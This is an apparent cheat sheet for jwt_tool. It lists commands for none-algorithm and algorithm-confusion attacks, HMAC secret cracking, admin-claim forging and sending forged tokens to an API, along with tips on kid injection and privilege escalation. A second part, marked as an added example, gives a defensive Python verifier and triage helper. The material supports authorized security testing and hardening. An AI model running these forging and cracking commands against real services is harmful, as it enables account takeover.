jwt_tool Cheat Sheet
JSON Web Token testing for algorithm confusion, weak secrets, and claim tampering.
Overview
jwt_tool audits JWTs used in APIs and web apps: decode claims, test none/algorithm confusion, brute-force weak HMAC secrets, and tamper with payloads on authorized targets.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
pip install jwt-tool
or
git clone https://github.com/ticarpi/jwt_tool.git
cd jwt_tool && pip install -r requirements.txt
Essential commands
Decode and scan token
python3 jwt_tool.py -h
python3 jwt_tool.py <JWT_STRING>
Tamper payload claim
python3 jwt_tool.py <JWT> -T
Common workflows
Full automated scan —
python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9... -M at
python3 jwt_tool.py eyJhbG... -C -d /usr/share/wordlists/jwt-secrets.txt
Algorithm confusion (RS256 → HS256) —
python3 jwt_tool.py <JWT> -X a
None algorithm —
python3 jwt_tool.py <JWT> -X n
Forge with known secret —
python3 jwt_tool.py <JWT> -I -pc name -pv admin -S hs256 -p "secret123"
Send forged token to API —
python3 jwt_tool.py <JWT> -R -t "https://target.example/api/me" -rh "Authorization: Bearer eyJ..."
Flags reference
| Flag | Purpose |
|---|---|
| -M at | All tests mode |
| -C | Crack HMAC secret (wordlist) |
| -d FILE | Dictionary for cracking |
| -X a | Algorithm confusion exploit |
| -X n | None algorithm |
| -T | Interactive tamper |
| -I | Inject / forge claims |
| -pc / -pv | Payload claim / value |
| -S | Signing algorithm |
| -p | Password / secret |
| -R | Send request with token |
| -t URL | Target URL |
| -rh | Request header with token |
Tips
- Capture JWT from Burp (Authorization header or cookie access_token).
- Check kid header attacks (path traversal, SQLi in key lookup) manually if jwt_tool flags them.
- After forging, test privilege escalation (role, admin, sub) only within scope.
- Asymmetric tokens: obtain public key from /.well-known/jwks.json or cert endpoints.
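The workflows and tips above describe what a finding looks like from the tester's side. The following is an added example (not jwt_tool code and not from its documentation) of the server-side fix and a log-triage check for the same token classes: a verifier that pins the algorithm from configuration instead of the token header (which defeats both the `-X n` none-algorithm case and the `-X a` RS256 to HS256 swap), enforces the 256-bit minimum HS256 key size from RFC 7518 section 3.2 (so a `secret123`-style secret cannot be configured), and treats `kid` as an allow-listed label rather than a path or query input. It is standard-library Python; the secret, the `kid` allow-list and every token are constructed for the demo.

```python
# Added example, not part of jwt_tool: a hardened HS256 verifier plus a header
# triage helper for gateways and log pipelines. Standard library only.
import base64
import hashlib
import hmac
import json
import time
from typing import List, Optional

# Constructed demo values (assumptions, not from any real deployment).
DEMO_SECRET = b"constructed-demo-secret-not-for-prod!"   # 37 bytes >= 32-byte minimum
ALLOWED_KIDS = {"demo-key-1"}                            # kid is a label, never a path


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def make_token(claims: dict, secret: bytes, alg: str = "HS256") -> str:
    """Test-fixture builder. alg='none' emits an unsigned token so the verifier's
    rejection path can be exercised; a real issuer never emits such a token."""
    def enc(obj) -> str:
        return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
    h, p = enc({"alg": alg, "typ": "JWT"}), enc(claims)
    sig = b"" if alg == "none" else hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


class JWTError(Exception):
    pass


def verify_hs256(token: str, secret: bytes, now: Optional[float] = None) -> dict:
    """Verify a token this service issued. The algorithm is pinned from server
    configuration; the header is attacker-controlled input and never selects
    the algorithm or the key material."""
    if len(secret) < 32:  # RFC 7518 s.3.2: HS256 key must be >= hash output size
        raise JWTError("HS256 secret shorter than 256 bits")
    parts = token.split(".")
    if len(parts) != 3:
        raise JWTError("malformed token")
    h_b64, p_b64, s_b64 = parts
    header = json.loads(b64url_decode(h_b64))
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        # Rejects alg=none and any RS256->HS256 swap before touching the signature.
        raise JWTError(f"unexpected alg {header.get('alg') if isinstance(header, dict) else None!r}")
    if "kid" in header and header["kid"] not in ALLOWED_KIDS:
        raise JWTError("unknown kid")  # never used to build a file path or SQL query
    expected = hmac.new(secret, f"{h_b64}.{p_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s_b64)):
        raise JWTError("signature mismatch")
    claims = json.loads(b64url_decode(p_b64))
    now = time.time() if now is None else now
    if not isinstance(claims.get("exp"), (int, float)) or claims["exp"] <= now:
        raise JWTError("missing or expired exp")
    return claims


def triage_header(token: str, expected_alg: str) -> List[str]:
    """Detection helper: findings about a token header without trusting it.
    An empty list means the header looks as the service expects."""
    findings = []
    try:
        header = json.loads(b64url_decode(token.split(".")[0]))
    except (ValueError, IndexError):  # covers base64 and JSON decode errors
        return ["undecodable header"]
    if not isinstance(header, dict):
        return ["header is not a JSON object"]
    alg = str(header.get("alg", ""))
    if alg.lower() == "none":
        findings.append("alg=none (unsigned token)")
    elif alg.upper() != expected_alg.upper():
        findings.append(f"alg {alg!r} differs from expected {expected_alg}")
    kid = header.get("kid")
    if isinstance(kid, str) and any(c in kid for c in "/\\'\";"):
        findings.append("kid contains path or query metacharacters")
    return findings


def demo(now: float = 1_700_000_000.0) -> dict:
    """Run the verifier against a valid token and constructed forged variants."""
    base = {"sub": "alice", "exp": now + 600}
    tokens = {
        "good": make_token({**base, "role": "user"}, DEMO_SECRET),
        "unsigned": make_token({**base, "role": "admin"}, DEMO_SECRET, alg="none"),
        "wrong_secret": make_token({**base, "role": "admin"}, b"other-constructed-secret-32-bytes-xx"),
        "expired": make_token({"sub": "alice", "role": "user", "exp": now - 1}, DEMO_SECRET),
    }
    results = {}
    for name, tok in tokens.items():
        try:
            results[name] = verify_hs256(tok, DEMO_SECRET, now=now)["role"]
        except JWTError as e:
            results[name] = f"rejected: {e}"
    results["triage_unsigned"] = triage_header(tokens["unsigned"], "HS256")
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The same pinning rule applies to asymmetric tokens: an RS256 service checks `alg == "RS256"` and looks up the public key by an allow-listed `kid` from its configured JWKS, so a token whose header says HS256 is rejected before the public key can ever be used as an HMAC secret.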